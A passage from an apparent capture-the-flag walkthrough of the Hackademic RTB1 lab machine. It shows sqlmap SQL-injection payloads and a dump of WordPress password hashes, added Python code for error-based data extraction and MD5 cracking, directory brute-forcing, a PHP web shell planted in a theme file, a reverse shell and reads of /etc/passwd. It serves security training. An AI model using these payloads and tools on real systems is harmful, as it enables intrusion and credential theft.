[15:48:10] [INFO] retrieved: 'EVENTS'
[15:48:10] [INFO] retrieved: 'information_schema'
[15:48:10] [INFO] retrieved: 'FILES'
[15:48:10] [INFO] retrieved: 'information_schema'
[15:48:10] [INFO] retrieved: 'GLOBAL_STATUS'
[15:48:11] [INFO] retrieved: 'information_schema'
[15:48:11] [INFO] retrieved: 'GLOBAL_VARIABLES'
[15:48:11] [INFO] retrieved: 'information_schema'
[15:48:11] [INFO] retrieved: 'KEY_COLUMN_USAGE'
[15:48:11] [INFO] retrieved: 'information_schema'
[15:48:11] [INFO] retrieved: 'PARTITIONS'
[15:48:11] [INFO] retrieved: 'information_schema'
[15:48:11] [INFO] retrieved: 'PLUGINS'
[15:48:11] [INFO] retrieved: 'information_schema'
[15:48:11] [INFO] retrieved: 'PROCESSLIST'
[15:48:11] [INFO] retrieved: 'information_schema'
[15:48:11] [INFO] retrieved: 'PROFILING'
[15:48:11] [INFO] retrieved: 'information_schema'
[15:48:11] [INFO] retrieved: 'REFERENTIAL_CONSTRAINTS'
[15:48:11] [INFO] retrieved: 'information_schema'
[15:48:11] [INFO] retrieved: 'ROUTINES'
[15:48:11] [INFO] retrieved: 'information_schema'
[15:48:11] [INFO] retrieved: 'SCHEMATA'
[15:48:11] [INFO] retrieved: 'information_schema'
[15:48:11] [INFO] retrieved: 'SCHEMA_PRIVILEGES'
[15:48:11] [INFO] retrieved: 'information_schema'
[15:48:11] [INFO] retrieved: 'SESSION_STATUS'
[15:48:11] [INFO] retrieved: 'information_schema'
[15:48:11] [INFO] retrieved: 'SESSION_VARIABLES'
[15:48:11] [INFO] retrieved: 'information_schema'
[15:48:11] [INFO] retrieved: 'STATISTICS'
[15:48:11] [INFO] retrieved: 'information_schema'
[15:48:11] [INFO] retrieved: 'TABLES'
[15:48:11] [INFO] retrieved: 'information_schema'
[15:48:11] [INFO] retrieved: 'TABLE_CONSTRAINTS'
[15:48:11] [INFO] retrieved: 'information_schema'
[15:48:12] [INFO] retrieved: 'TABLE_PRIVILEGES'
[15:48:12] [INFO] retrieved: 'information_schema'
[15:48:12] [INFO] retrieved: 'TRIGGERS'
[15:48:12] [INFO] retrieved: 'information_schema'
[15:48:12] [INFO] retrieved: 'USER_PRIVILEGES'
[15:48:12] [INFO] retrieved: 'information_schema'
[15:48:12] [INFO] retrieved: 'VIEWS'
[15:48:12] [INFO] retrieved: 'mysql'
[15:48:12] [INFO] retrieved: 'columns_priv'
[15:48:12] [INFO] retrieved: 'mysql'
[15:48:12] [INFO] retrieved: 'db'
[15:48:12] [INFO] retrieved: 'mysql'
[15:48:12] [INFO] retrieved: 'event'
[15:48:12] [INFO] retrieved: 'mysql'
[15:48:12] [INFO] retrieved: 'func'
[15:48:12] [INFO] retrieved: 'mysql'
[15:48:12] [INFO] retrieved: 'general_log'
[15:48:12] [INFO] retrieved: 'mysql'
[15:48:12] [INFO] retrieved: 'help_category'
[15:48:12] [INFO] retrieved: 'mysql'
[15:48:12] [INFO] retrieved: 'help_keyword'
[15:48:12] [INFO] retrieved: 'mysql'
[15:48:12] [INFO] retrieved: 'help_relation'
[15:48:12] [INFO] retrieved: 'mysql'
[15:48:12] [INFO] retrieved: 'help_topic'
[15:48:12] [INFO] retrieved: 'mysql'
[15:48:12] [INFO] retrieved: 'host'
[15:48:12] [INFO] retrieved: 'mysql'
[15:48:12] [INFO] retrieved: 'ndb_binlog_index'
[15:48:12] [INFO] retrieved: 'mysql'
[15:48:12] [INFO] retrieved: 'plugin'
[15:48:12] [INFO] retrieved: 'mysql'
[15:48:12] [INFO] retrieved: 'proc'
[15:48:13] [INFO] retrieved: 'mysql'
[15:48:13] [INFO] retrieved: 'procs_priv'
[15:48:13] [INFO] retrieved: 'mysql'
[15:48:13] [INFO] retrieved: 'servers'
[15:48:13] [INFO] retrieved: 'mysql'
[15:48:13] [INFO] retrieved: 'slow_log'
[15:48:13] [INFO] retrieved: 'mysql'
[15:48:13] [INFO] retrieved: 'tables_priv'
[15:48:13] [INFO] retrieved: 'mysql'
[15:48:13] [INFO] retrieved: 'time_zone'
[15:48:13] [INFO] retrieved: 'mysql'
[15:48:13] [INFO] retrieved: 'time_zone_leap_second'
[15:48:13] [INFO] retrieved: 'mysql'
[15:48:13] [INFO] retrieved: 'time_zone_name'
[15:48:13] [INFO] retrieved: 'mysql'
[15:48:13] [INFO] retrieved: 'time_zone_transition'
[15:48:13] [INFO] retrieved: 'mysql'
[15:48:13] [INFO] retrieved: 'time_zone_transition_type'
[15:48:13] [INFO] retrieved: 'mysql'
[15:48:13] [INFO] retrieved: 'user'
[15:48:13] [INFO] retrieved: 'wordpress'
[15:48:13] [INFO] retrieved: 'wp_categories'
[15:48:13] [INFO] retrieved: 'wordpress'
[15:48:13] [INFO] retrieved: 'wp_comments'
[15:48:13] [INFO] retrieved: 'wordpress'
[15:48:13] [INFO] retrieved: 'wp_linkcategories'
[15:48:13] [INFO] retrieved: 'wordpress'
[15:48:13] [INFO] retrieved: 'wp_links'
[15:48:13] [INFO] retrieved: 'wordpress'
[15:48:13] [INFO] retrieved: 'wp_options'
[15:48:13] [INFO] retrieved: 'wordpress'
[15:48:13] [INFO] retrieved: 'wp_post2cat'
[15:48:14] [INFO] retrieved: 'wordpress'
[15:48:14] [INFO] retrieved: 'wp_postmeta'
[15:48:14] [INFO] retrieved: 'wordpress'
[15:48:14] [INFO] retrieved: 'wp_posts'
[15:48:14] [INFO] retrieved: 'wordpress'
[15:48:14] [INFO] retrieved: 'wp_users'
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMN_PRIVILEGES                     |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| KEY_COLUMN_USAGE                      |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| USER_PRIVILEGES                       |
| VIEWS                                 |
| COLUMNS                               |
| ENGINES                               |
| EVENTS                                |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| TABLES                                |
| TRIGGERS                              |
+---------------------------------------+
Database: mysql
[23 tables]
+---------------------------------------+
| event                                 |
| host                                  |
| plugin                                |
| user                                  |
| columns_priv                          |
| db                                    |
| func                                  |
| general_log                           |
| help_category                         |
| help_keyword                          |
| help_relation                         |
| help_topic                            |
| ndb_binlog_index                      |
| proc                                  |
| procs_priv                            |
| servers                               |
| slow_log                              |
| tables_priv                           |
| time_zone                             |
| time_zone_leap_second                 |
| time_zone_name                        |
| time_zone_transition                  |
| time_zone_transition_type             |
+---------------------------------------+
Database: wordpress
[9 tables]
+---------------------------------------+
| wp_categories                         |
| wp_comments                           |
| wp_linkcategories                     |
| wp_links                              |
| wp_options                            |
| wp_post2cat                           |
| wp_postmeta                           |
| wp_posts                              |
| wp_users                              |
+---------------------------------------+
[15:48:14] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 122 times
[15:48:14] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\192.168.65.135'
[*] ending @ 15:48:14 /2024-01-16/
sqlmap -u http://192.168.65.135/Hackademic_RTB1/?cat=key.txt --level=2 -D wordpress -T wp_users --columns
D:\Global\apps\sqlmap\current>python3 "sqlmap.py" -u http://192.168.65.135/Hackademic_RTB1/?cat=key.txt --level=2 -D wordpress -T wp_users --columns
___
__H__
___ ___[(]_____ ___ ___  {1.7.9#stable}
|_ -| . [)]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
|_|V...       |_|   https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:49:20 /2024-01-16/
[15:49:20] [INFO] resuming back-end DBMS 'mysql'
[15:49:20] [INFO] testing connection to the target URL
[15:49:20] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cat (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: cat=key.txt AND (SELECT 5987 FROM(SELECT COUNT(*),CONCAT(0x716a767171,(SELECT (ELT(5987=5987,1))),0x717a716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: cat=key.txt AND (SELECT 8686 FROM (SELECT(SLEEP(5)))iqzp)
---
[15:49:20] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora 13 (Goddard)
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL >= 5.0
[15:49:20] [INFO] fetching columns for table 'wp_users' in database 'wordpress'
[15:49:20] [WARNING] reflective value(s) found and filtering out
[15:49:21] [INFO] retrieved: 'ID'
[15:49:21] [INFO] retrieved: 'bigint(20) unsigned'
[15:49:21] [INFO] retrieved: 'user_login'
[15:49:21] [INFO] retrieved: 'varchar(60)'
[15:49:21] [INFO] retrieved: 'user_pass'
[15:49:21] [INFO] retrieved: 'varchar(64)'
[15:49:21] [INFO] retrieved: 'user_firstname'
[15:49:21] [INFO] retrieved: 'varchar(50)'
[15:49:21] [INFO] retrieved: 'user_lastname'
[15:49:21] [INFO] retrieved: 'varchar(50)'
[15:49:21] [INFO] retrieved: 'user_nickname'
[15:49:21] [INFO] retrieved: 'varchar(50)'
[15:49:21] [INFO] retrieved: 'user_nicename'
[15:49:21] [INFO] retrieved: 'varchar(50)'
[15:49:21] [INFO] retrieved: 'user_icq'
[15:49:21] [INFO] retrieved: 'int(10) unsigned'
[15:49:21] [INFO] retrieved: 'user_email'
[15:49:21] [INFO] retrieved: 'varchar(100)'
[15:49:21] [INFO] retrieved: 'user_url'
[15:49:21] [INFO] retrieved: 'varchar(100)'
[15:49:21] [INFO] retrieved: 'user_ip'
[15:49:21] [INFO] retrieved: 'varchar(15)'
[15:49:21] [INFO] retrieved: 'user_domain'
[15:49:21] [INFO] retrieved: 'varchar(200)'
[15:49:21] [INFO] retrieved: 'user_browser'
[15:49:21] [INFO] retrieved: 'varchar(200)'
[15:49:21] [INFO] retrieved: 'user_registered'
[15:49:21] [INFO] retrieved: 'datetime'
[15:49:21] [INFO] retrieved: 'user_level'
[15:49:22] [INFO] retrieved: 'int(2) unsigned'
[15:49:22] [INFO] retrieved: 'user_aim'
[15:49:22] [INFO] retrieved: 'varchar(50)'
[15:49:22] [INFO] retrieved: 'user_msn'
[15:49:22] [INFO] retrieved: 'varchar(100)'
[15:49:22] [INFO] retrieved: 'user_yim'
[15:49:22] [INFO] retrieved: 'varchar(50)'
[15:49:22] [INFO] retrieved: 'user_idmode'
[15:49:22] [INFO] retrieved: 'varchar(20)'
[15:49:22] [INFO] retrieved: 'user_activation_key'
[15:49:22] [INFO] retrieved: 'varchar(60)'
[15:49:22] [INFO] retrieved: 'user_status'
[15:49:22] [INFO] retrieved: 'int(11)'
[15:49:22] [INFO] retrieved: 'user_description'
[15:49:22] [INFO] retrieved: 'longtext'
Database: wordpress
Table: wp_users
[22 columns]
+---------------------+---------------------+
| Column              | Type                |
+---------------------+---------------------+
| ID                  | bigint(20) unsigned |
| user_activation_key | varchar(60)         |
| user_aim            | varchar(50)         |
| user_browser        | varchar(200)        |
| user_description    | longtext            |
| user_domain         | varchar(200)        |
| user_email          | varchar(100)        |
| user_firstname      | varchar(50)         |
| user_icq            | int(10) unsigned    |
| user_idmode         | varchar(20)         |
| user_ip             | varchar(15)         |
| user_lastname       | varchar(50)         |
| user_level          | int(2) unsigned     |
| user_login          | varchar(60)         |
| user_msn            | varchar(100)        |
| user_nicename       | varchar(50)         |
| user_nickname       | varchar(50)         |
| user_pass           | varchar(64)         |
| user_registered     | datetime            |
| user_status         | int(11)             |
| user_url            | varchar(100)        |
| user_yim            | varchar(50)         |
+---------------------+---------------------+
[15:49:22] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 46 times
[15:49:22] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\192.168.65.135'
[*] ending @ 15:49:22 /2024-01-16/
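How the error-based injection above actually carries data out, as an added Python example (not part of the original writeup and not sqlmap's code): the two hex literals in the payload, 0x716a767171 and 0x717a716271, are the marker strings qjvqq and qzqbq. The CONCAT(...)/FLOOR(RAND(0)*2)/GROUP BY construct makes MySQL raise a 'Duplicate entry' error whose text contains the marked subquery result, and the client only has to cut the value out from between the markers. The sample error page and the `simulated_send` oracle are constructed stand-ins for the HTTP round trip, not captured traffic; `dump_column` takes any `send(param_value) -> body` callable, so against a live target it would be handed a thin wrapper around an HTTP GET.

```python
import re

# The two hex literals in sqlmap's payload decode to these marker strings;
# the client searches for them in the error message to find the extracted value.
PREFIX = bytes.fromhex("716a767171").decode()   # 'qjvqq'
SUFFIX = bytes.fromhex("717a716271").decode()   # 'qzqbq'


def hex_literal(s: str) -> str:
    """MySQL hex string literal, e.g. 'qjvqq' -> 0x716a767171. No quotes are
    needed, which is what lets the payload survive simple quote filtering."""
    return "0x" + s.encode().hex()


def build_floor_payload(subquery: str, original_value: str = "key.txt") -> str:
    """Value to send in the vulnerable `cat` parameter.

    `subquery` must return exactly one row and one column, e.g.
    "SELECT user_pass FROM wordpress.wp_users LIMIT 0,1".
    GROUP BY over a key containing FLOOR(RAND(0)*2) makes MySQL re-evaluate
    the key between looking it up and inserting it into its temporary table,
    so the same key is inserted twice and the server fails with
    ERROR 1062 'Duplicate entry <key>', echoing <key> (and our value) back.
    """
    key = (f"CONCAT({hex_literal(PREFIX)},({subquery}),"
           f"{hex_literal(SUFFIX)},FLOOR(RAND(0)*2))")
    return (f"{original_value} AND (SELECT 1 FROM(SELECT COUNT(*),{key}x "
            f"FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)")


_MARKED = re.compile(re.escape(PREFIX) + r"(.*?)" + re.escape(SUFFIX), re.S)


def extract_value(response_body: str):
    """Return the subquery result echoed inside the duplicate-entry error, or
    None when the response carries no marked value (a bare 500 page, say).
    That None is the case where a tool must fall back to a blind technique
    such as the time-based one sqlmap also identified."""
    m = _MARKED.search(response_body)
    return m.group(1) if m else None


def dump_column(send, column: str, table: str, limit: int = 50):
    """Walk a column row by row through the error oracle.

    `send(param_value) -> response_body` is supplied by the caller; rows stop
    at the first response without a marked value or after `limit` rows.
    """
    rows = []
    for i in range(limit):
        body = send(build_floor_payload(f"SELECT {column} FROM {table} LIMIT {i},1"))
        value = extract_value(body)
        if value is None:
            break
        rows.append(value)
    return rows


# --- constructed stand-ins for the HTTP round trip (not captured traffic) ---

SAMPLE_ERROR_PAGE = (
    "Duplicate entry 'qjvqq21232f297a57a5a743894a0e4a801fc3qzqbq1' "
    "for key 'group_key'"
)

_FAKE_TABLE = ["NickJames", "MaxBucky", "GeorgeMiller"]   # hypothetical rows


def simulated_send(param_value: str) -> str:
    """Pretend MySQL backend: answers LIMIT i,1 from _FAKE_TABLE with the error
    text a real server produces, or a plain 500 page past the last row."""
    m = re.search(r"LIMIT (\d+),1", param_value)
    i = int(m.group(1)) if m else 0
    if i < len(_FAKE_TABLE):
        return f"Duplicate entry '{PREFIX}{_FAKE_TABLE[i]}{SUFFIX}1' for key 'group_key'"
    return "500 Internal Server Error"


if __name__ == "__main__":
    print(build_floor_payload("SELECT user_pass FROM wordpress.wp_users LIMIT 0,1"))
    print(extract_value(SAMPLE_ERROR_PAGE))
    print(dump_column(simulated_send, "user_login", "wp_users"))
```

The 500 responses sqlmap warned about are the same error firing: the page dies on the MySQL error, but because the error text reaches the response body the injection stays error-based rather than blind.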
sqlmap -u http://192.168.65.135/Hackademic_RTB1/?cat=key.txt --level=2 -D wordpress -T wp_users -C "user_firstname,user_lastname,user_pass" --dump
D:\Global\apps\sqlmap\current>python3 "sqlmap.py" -u http://192.168.65.135/Hackademic_RTB1/?cat=key.txt --level=2 -D wordpress -T wp_users -C user_firstname,user_lastname,user_pass --dump
___
__H__
___ ___[(]_____ ___ ___  {1.7.9#stable}
|_ -| . [.]     | .'| . |
|___|_  [']_|_|_|__,|  _|
|_|V...       |_|   https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:57:40 /2024-01-16/
[15:57:40] [INFO] resuming back-end DBMS 'mysql'
[15:57:40] [INFO] testing connection to the target URL
[15:57:40] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cat (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: cat=key.txt AND (SELECT 5987 FROM(SELECT COUNT(*),CONCAT(0x716a767171,(SELECT (ELT(5987=5987,1))),0x717a716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: cat=key.txt AND (SELECT 8686 FROM (SELECT(SLEEP(5)))iqzp)
[15:57:40] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL >= 5.0
[15:57:40] [INFO] fetching entries of column(s) 'user_firstname,user_lastname,user_pass' for table 'wp_users' in database 'wordpress'
[15:57:40] [WARNING] reflective value(s) found and filtering out
[15:57:40] [INFO] retrieved: 'Nick'
[15:57:41] [INFO] retrieved: '21232f297a57a5a743894a0e4a801fc3'
[15:57:41] [INFO] retrieved: 'Max'
[15:57:41] [INFO] retrieved: '50484c19f1afdaf3841a0d821ed393d2'
[15:57:41] [INFO] retrieved: 'George'
[15:57:41] [INFO] retrieved: 'Miller'
[15:57:41] [INFO] retrieved: '7cbb3252ba6b7e9c422fac5334d22054'
[15:57:41] [INFO] retrieved: 'Jason'
[15:57:41] [INFO] retrieved: 'Konnors'
[15:57:41] [INFO] retrieved: '8601f6e1028a8e8a966f6c33fcd9aec4'
[15:57:41] [INFO] retrieved: 'Tony'
[15:57:41] [INFO] retrieved: 'Black'
[15:57:41] [INFO] retrieved: 'a6e514f9486b83cb53d8d932f9a04292'
[15:57:41] [INFO] retrieved: 'John'
[15:57:41] [INFO] retrieved: 'Smith'
[15:57:41] [INFO] retrieved: 'b986448f0bb9e5e124ca91d3d650f52c'
[15:57:41] [INFO] recognized possible password hashes in column 'user_pass'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
do you want to crack them via a dictionary-based attack? [Y/n/q]
[15:57:49] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'D:\Global\apps\sqlmap\1.7.9\data\txt\wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>
[15:57:52] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N]
[15:57:53] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[15:57:53] [INFO] starting 2 processes
[15:57:59] [INFO] cracked password 'napoleon' for hash 'a6e514f9486b83cb53d8d932f9a04292'
[15:58:00] [INFO] cracked password 'q1w2e3' for hash '7cbb3252ba6b7e9c422fac5334d22054'
[15:58:00] [INFO] cracked password 'admin' for hash '21232f297a57a5a743894a0e4a801fc3'
[15:58:26] [INFO] cracked password 'kernel' for hash '50484c19f1afdaf3841a0d821ed393d2'
[15:58:32] [INFO] cracked password 'maxwell' for hash '8601f6e1028a8e8a966f6c33fcd9aec4'
Database: wordpress
Table: wp_users
[6 entries]
+----------------+---------------+---------------------------------------------+
| user_firstname | user_lastname | user_pass                                   |
+----------------+---------------+---------------------------------------------+
| Nick           | James         | 21232f297a57a5a743894a0e4a801fc3 (admin)    |
| Max            | Bucky         | 50484c19f1afdaf3841a0d821ed393d2 (kernel)   |
| George         | Miller        | 7cbb3252ba6b7e9c422fac5334d22054 (q1w2e3)   |
| Jason          | Konnors       | 8601f6e1028a8e8a966f6c33fcd9aec4 (maxwell)  |
| Tony           | Black         | a6e514f9486b83cb53d8d932f9a04292 (napoleon) |
| John           | Smith         | b986448f0bb9e5e124ca91d3d650f52c            |
+----------------+---------------+---------------------------------------------+
[15:58:58] [INFO] table 'wordpress.wp_users' dumped to CSV file 'C:\Users\Administrator\AppData\Local\sqlmap\output\192.168.65.135\dump\wordpress\wp_users.csv'
[15:58:58] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 20 times
[15:58:58] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\192.168.65.135'
[*] ending @ 15:58:58 /2024-01-16/

Five of the six passwords fall to sqlmap's default wordlist; only John Smith's hash holds out.
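Why the dictionary attack finishes in seconds, as an added example (my code, not the writeup's or sqlmap's): the dumped user_pass values are 32-hex-character unsalted MD5 digests (sqlmap's 'md5_generic_passwd'), so each candidate word is hashed once and looked up against every account at the same time. The hashes are the six from the dump above; the wordlist is a constructed stand-in for sqlmap's wordlist.txt, and the suffix list mirrors sqlmap's optional "common password suffixes" pass.

```python
import hashlib

# The six user_pass values sqlmap dumped from wordpress.wp_users above.
DUMPED_HASHES = {
    "Nick James":    "21232f297a57a5a743894a0e4a801fc3",
    "Max Bucky":     "50484c19f1afdaf3841a0d821ed393d2",
    "George Miller": "7cbb3252ba6b7e9c422fac5334d22054",
    "Jason Konnors": "8601f6e1028a8e8a966f6c33fcd9aec4",
    "Tony Black":    "a6e514f9486b83cb53d8d932f9a04292",
    "John Smith":    "b986448f0bb9e5e124ca91d3d650f52c",
}

# Constructed stand-in for sqlmap's wordlist.txt. A real run uses a far
# larger list, but the cost per candidate is identical.
WORDLIST = ["password", "123456", "admin", "kernel", "q1w2e3",
            "letmein", "maxwell", "napoleon", "wordpress"]

# Mirrors sqlmap's optional "common password suffixes" pass.
COMMON_SUFFIXES = ("", "1", "123", "!", "2011")


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode()).hexdigest()


def is_raw_md5(h: str) -> bool:
    """Old WordPress (before 2.5) stored user_pass as bare MD5: exactly 32 hex
    characters, no salt, no '$P$' phpass prefix. Only such hashes are
    attackable with a plain shared-wordlist lookup like the one below."""
    return len(h) == 32 and all(c in "0123456789abcdef" for c in h.lower())


def crack_md5(hashes, wordlist, suffixes=("",)):
    """Reverse lookup: hash each candidate once and test it against every
    pending target, so the cost is len(wordlist) * len(suffixes) MD5 calls
    regardless of how many hashes were dumped. Unsalted storage is exactly
    what makes that sharing possible. Returns {hash: plaintext} for hits."""
    pending = {h.lower() for h in hashes if is_raw_md5(h)}
    found = {}
    for word in wordlist:
        for suffix in suffixes:
            candidate = word + suffix
            digest = md5_hex(candidate)
            if digest in pending:
                found[digest] = candidate
                pending.discard(digest)
        if not pending:
            break
    return found


def crack_report(users_to_hashes, wordlist, suffixes=("",)):
    """Per-user view like sqlmap's dump table: [(name, hash, plaintext or None)]."""
    found = crack_md5(users_to_hashes.values(), wordlist, suffixes)
    return [(name, h, found.get(h.lower())) for name, h in users_to_hashes.items()]


if __name__ == "__main__":
    for name, h, pw in crack_report(DUMPED_HASHES, WORDLIST, COMMON_SUFFIXES):
        print(f"{name:14} {h}  {pw if pw else '(not in wordlist)'}")
```

A salted, iterated scheme (WordPress's later phpass hashes, bcrypt) defeats the shared lookup: every account needs its own pass over the wordlist, and each candidate costs thousands of hash rounds instead of one.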

Directory brute-forcing

The database holds WordPress tables, so brute-force paths to locate the WordPress install.

gobuster dir -u http://192.168.65.135 --wordlist=D:\Global\apps\SecLists\current\Discovery\Web-Content\raft-large-directories.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.65.135
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                D:\Global\apps\SecLists\current\Discovery\Web-Content\raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2024/01/16 16:02:04 Starting gobuster in directory enumeration mode
===============================================================
/phpmyadmin           (Status: 403) [Size: 292]
/phpMyAdmin           (Status: 403) [Size: 292]
Progress: 23536 / 62285 (37.79%)[ERROR] 2024/01/16 16:02:14 [!] parse "http://192.168.65.135/error\x1f_log": net/url: invalid control character in URL
Progress: 62162 / 62285 (99.80%)
===============================================================
2024/01/16 16:02:37 Finished
===============================================================

Nothing useful at the web root (only a forbidden phpMyAdmin); retry under the Hackademic_RTB1 directory instead.

gobuster dir -u http://192.168.65.135/Hackademic_RTB1/ --wordlist=D:\Global\apps\SecLists\current\Discovery\Web-Content\raft-large-directories.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.65.135/Hackademic_RTB1/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                D:\Global\apps\SecLists\current\Discovery\Web-Content\raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2024/01/16 16:03:40 Starting gobuster in directory enumeration mode
===============================================================
/wp-content           (Status: 301) [Size: 337] [--> http://192.168.65.135/Hackademic_RTB1/wp-content/]
/wp-admin             (Status: 301) [Size: 335] [--> http://192.168.65.135/Hackademic_RTB1/wp-admin/]
/wp-includes          (Status: 301) [Size: 338] [--> http://192.168.65.135/Hackademic_RTB1/wp-includes/]
/wp-images            (Status: 301) [Size: 336] [--> http://192.168.65.135/Hackademic_RTB1/wp-images/]
Progress: 23662 / 62285 (37.99%)[ERROR] 2024/01/16 16:04:01 [!] parse "http://192.168.65.135/Hackademic_RTB1/error\x1f_log": net/url: invalid control character in URL
Progress: 39297 / 62285 (63.09%)[ERROR] 2024/01/16 16:04:16 [!] Get "http://192.168.65.135/Hackademic_RTB1/ouachita": dial tcp 192.168.65.135:80: connectex: Only one usage of each socket address (protocol/network address/port) is normally permitted.
Progress: 62023 / 62285 (99.58%)
===============================================================
2024/01/16 16:04:35 Finished
===============================================================

That exposes /wp-admin; try the credentials cracked earlier against the login form.

Logging in as George Miller (q1w2e3) shows the account can edit theme files. The theme editor writes PHP to disk under the web root, so that permission is effectively code execution on the web server.

Append a PHP web shell to the bottom of the Header Template.

Connect with AntSword (蚁剑), then spawn a reverse shell back to the attacking host (192.168.65.128):

nc -lvvp 4444
listening on [any] 4444 ...
192.168.65.135: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [192.168.65.128] from (UNKNOWN) [192.168.65.135] 48355: NO_DATA
bash: no job control in this shell
bash-4.0$

Host enumeration

bash-4.0$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:499:virtual console memory owner:/dev:/sbin/nologin
avahi-autoipd:x:499:498:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rtkit:x:498:494:RealtimeKit:/proc:/sbin/nologin
nscd:x:28:493:NSCD Daemon:/:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
avahi:x:497:492:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
haldaemon:x:68:491:HAL daemon:/:/sbin/nologin
openvpn:x:496:490:OpenVPN:/etc/openvpn:/sbin/nologin
apache:x:48:489:Apache:/var/www:/sbin/nologin
saslauth:x:495:488:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
mailnull:x:47:487::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:486::/var/spool/mqueue:/sbin/nologin
smolt:x:494:485:Smolt:/usr/share/smolt:/sbin/nologin
sshd:x:74:484:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
pulse:x:493:483:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
gdm:x:42:481::/var/lib/gdm:/sbin/nologin
p0wnbox.Team:x:500:500:p0wnbox.Team:/home/p0wnbox.Team:/bin/bash
mysql:x:27:480:MySQL Server:/var/lib/mysql:/bin/bash
bash-4.0$ cat /etc/shadow
cat /etc/shadow
cat: /etc/shadow: Permission denied
bash-4.0$ cat /etc/crontab
cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
